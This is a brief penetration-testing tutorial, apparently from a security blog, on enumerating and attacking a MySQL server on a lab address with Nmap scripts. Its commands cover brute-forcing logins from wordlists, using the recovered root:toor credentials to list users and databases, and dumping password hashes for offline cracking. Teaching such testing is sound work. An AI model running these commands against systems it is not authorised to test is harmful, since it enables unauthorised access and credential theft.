https://www.hackingarticles.in/mysql-penetration-testing-nmap/
MySQL Penetration Testing with Nmap

basically MySQL service is activated on default port 3306.

nmap -sT 192.168.1.216
we can observe port 3306 is open for MySQL service, now let’s enumerate it.

Retrieve MySQL information
Now type another command to retrieve MySQL information such as version, protocol and etc:

nmap --script=mysql-info 192.168.1.216
---------------------------------------
Brute force attack
This command will use the dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.216
---------------
# from above cmd it found the valid credential root: toor. This credential will help indirectly login into MYSQL server.

Retrieve MySQL usernames
This command will fetch MySQL users name which helps of given argument MySQL user root and mysqlpass toor.

nmap -p3306 192.168.1.216 --script=mysql-users --script-args mysqluser=root,mysqlpass=toor
-------------------------------------------------------------------------------------------------

Retrieve database names
This command will fetch MySQL database name which helps of given argument mysqluser root and mysqlpass toor.

nmap -p3306 192.168.1.216 --script=mysql-databases --script-args mysqluser=root,mysqlpass=toor

nmap -p 3306 192.168.1.216 --script=mysql-query --script-args "query=show databases,username=root,password=toor"
-------------------------------------------------------------------------------------------------------------------

Retrieve MySQL variable status ON/OFF
When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch MySQL variables name which help of given argument mysqluser root and mysqlpass toor.

nmap -p3306 192.168.1.216 --script=mysql-variables --script-args mysqluser=root,mysqlpass=toor
-----------------------------------------------------------------------------------------------------------------------------------------------
Retrieve Hash Dump
This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p3306 192.168.1.216 --script=mysql-dump-hashes --script-args username=root,password=toor
-------------------------------------------------------------------------------------------------------------------------------------

